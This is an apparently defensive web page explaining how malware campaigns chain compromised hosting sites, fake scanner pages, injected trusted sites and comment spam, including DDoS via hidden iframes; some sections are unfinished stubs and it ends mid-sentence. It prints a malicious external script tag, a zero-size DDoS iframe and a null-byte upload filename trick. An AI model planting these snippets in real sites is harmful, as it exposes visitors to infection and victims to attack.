W.O.P.R   W.O.P.R STORM monitor - Rationale, or Understanding your enemy   Help


NB undergoing changes

The Tree structure of the malware process.

On this page, you will finda graphical representation of the tree structure of the malware. By hovering the mouse, small popup shows, and to go to the explanation in full, just click on the picture. After the picture, there are explanations about
  1. Sites
  2. The install process
  3. The browsing process
  4. DDoS attacks using servers instrad of PC zombies
This page is developed by monitoring thousands of attempts to inject code/spam on a site. By logging, watching, and backtracing the various URL's, this pattern shows up almost in every instance.
picture showing the Malware process

Explain not found


Description of the sites

The Endpoint

Servers - or sites - where the malware is hosted. Typically, this is sites which are infected, and not owned by the criminals.
The malware is many variations of things: The files can be placed by using FTP,SSH, vulnerable HTML upload etc. But I have also seen malware hosted in a photogallery. This is done by uploading the exe-file as a picture: filename.exe%00.jpg Notice the %00 part, which is a hexadecimal zero, terminating the string. Apart from direct upload, the criminals uses PHP code to place files. Examples are r57shell, namogofer. An example of a danish company, which were used as placeholder, is described in this article: http://www.version2.dk/artikel/7100

Phishing/fake - site

Contains phishing/fake scanners and/or porn. Some malware simulates virus scanning, others shows as need for update of video codec, or flash update.
They can be difficult to investigate, since I have seen example of 'sties' which:
  1. Activates fakes scanner
  2. Next visit shows some kind of porn
  3. Every visit after that shows an 404 Not found (but header is 200 OK)
This is probably done by changing rewriting rules in .htaccess Each 'instance' of the malware has its own directory - I stumbled upon a site where there was 400 directories, each containing various version of the malware. Some of the sites only contains various scripts to redirect to the endpoint. By using a separate site, the criminals adds an extra layer to layout a 'smoke trail'. I have put together som sceen shots of real malware in the wild here. Also a couple of reproduced playbacks, which is sources from the real world but with modified URI's to keep inside this domain.

Intermidiate sites

These sites are normal, trusted, sites. By injecting code, the visitor will be redirected to a fake/phishing site, or directly to the endpoint.
By trusted sites, I mean publically trusted sites - Government, Companies etc. - sites that people really trust. The goal is to inject a simple piece of <script> or <iframe> which will be executed automatically when the user visits the site. It basically does nothing but loading the layer from fake/phishing sites. An example of script tag:
<script src=http://www.adwadb.mobi/ngg.js></script>
But not all users are affected all the time, here is a Javascript example from the wild:
Notice here, that only browsers with languagecode different from the above list will be affected. It may give some hint about the origin of the code. Another thing, that makes it difficult to find upfront: Some scripts, when loaded, points to msn.com in an <iframe>, and not the malware script from the phishing sites. Furthermode there is a counter, so the criminals can see how many potential tagets(users) there is active. When there is 'enough', simply replace the script to point at phishing/malware. If we say 1000 active targets, invokes them all by changing one single file. So the buildup process width redirecting to msn.com can go (undiscovered) on for days,weeks, maybe more, since msn.com has so many hits, that a thousand more or less doesnt raise an alert. Just a little notide: The malware coders are sometimes kind of arrogant, they use jacascript like this: var fuckAntivirus = something. But this layer is also used to launch DDoS attacks. See DDoS attacks There are several ways to inject the tags, but common is:

Trusted sites

These sites are typically blogs or systems where you can post a comment. Basically alle sites, wher you can post some kind of link, including Facebook twitter etc.
On these systems, the posted content does not contain malware, or <script> tags. Typically, it is things like:
  1. See (some celebrity nude) here
  2. Look at this video with asian porn here
  3. Buy viagra cheap here
  4. Fantastic financial offer, look here
The links does not point to malware itself, but to intermidiate sites. (So the URL looks trustworthy) When the user click on the link, he will be redirected from the intermidiate site, over phishing site and eventually the malware. I have put together som sceen shots of real malware in the wild here. where the visual part came form phishing sites. Also a couple of reproduced playbacks, which is sources from the real world but with modified URI's to keep inside this domain. The playbacks shows the user experience when going through the process.

Description of the Construction process

Initial placeholders

The first step in the construction,is to find a vulnerable server to place the malware. There are various methods to probe for access:
  1. Dictionary attack against SSH
  2. Dictionary attack, or default user/password, against FTP
  3. Execution of remote code(PHP)
  4. SQL injection
Dictionary attack against SSH are using common user/passwords. In the log files you can se attempts to logon as root,admin,john,jane etc. When using FTP, such as Filezilla, default user/password are installed. If you don't change theese, you are inviting to get infected. Execution of PHP code, is very common. Probes for vulnerability is done by sending references to code in the querystring, such as: The probes typically does nothing harmfull, but returns information about the system. See example Another example is the namogofer, which just does: echo md5("just_a_test") When receiving a positive response, it signals vulnerabolity.

Phishing/fake install

The methods for finding sites to place this part is the same as described under Initial placeholders

Installing redirectors

The methods for finding sites to place this part is the same as described under Initial placeholders

Installing bait

There are various methods to bait. The obvious are email, but on the serverside, things as making blog/comment entries with multible links to intermidiate sites with keywords such as 'buy viagra','see person xyz nude', 'asian porn' etc.
It is done by inspecting the HTML for <form> tags with method="post", and simply POST'ing it with the links etc. The POST's are made according to the field name, so email will contain some kind of email address, message,comment contains links formed as <a href=.. or encapsulated in []. Another action is to use the link to intermidiate sites as referrer. When the webmaster sees it in his statistics, he might click the link, and might risk getting infected. Links to intermidiate can also be posted on Facebook, Twitter and other sites.

Description of the User browsing process

Requesting malware

Here the user (without his knowledge) requests malware.

User gets infected

By visiting the endpoint, which contains malware, the user (maybe) gets infected.

User redirect endpoint

(note: sprogkoder).

User requesting phishing

(note: sprogkoder).

User browsing phishing site

(note: sprogkoder).

User redirect to phishing

(note: sprogkoder).

Requesting intermidiate

(note: sprogkoder).

User browsing intermidiate

(note: sprogkoder).

Requesting startingpoint

(note: User thinks it's ok).

User will be redirected, doesn't observer anything

(note: iframe see xoomer).

The innocent/naive user

(note: Thinks the site is ok).

Description of the DDoS process

The innocent user participates in DDoS attacks

(note: through iframe, bot's (server/PHP)). This is done by injecting <iframe> tags where the 'src=' points to the victim.
To hide the request for the users, it is defined with zero size as this example
<iframe src=http://the.DDoS.victim width=0 height=0 frameborder=0></iframe>
To inject on the trusted sites, there are two ways to do that. File injection. When the hacker has gained access to the server it is done by running a program. This program traverses the directory where the files are located, and inserts/appends the tags into every .php, .htm, .html, .asp file, thereby activating the intermidiate layer for every single page.

The innocent user participates in DDoS attacks

(note: see #20 - redundant).

The DDoS victim

(note: zombies, 'tinsoldater', server side (create process)).
There are two ways to get the users into the trap.

Redirector - The user redirector NB to be integrated above

One of them is by issuing direct links to the user. This is done by things like: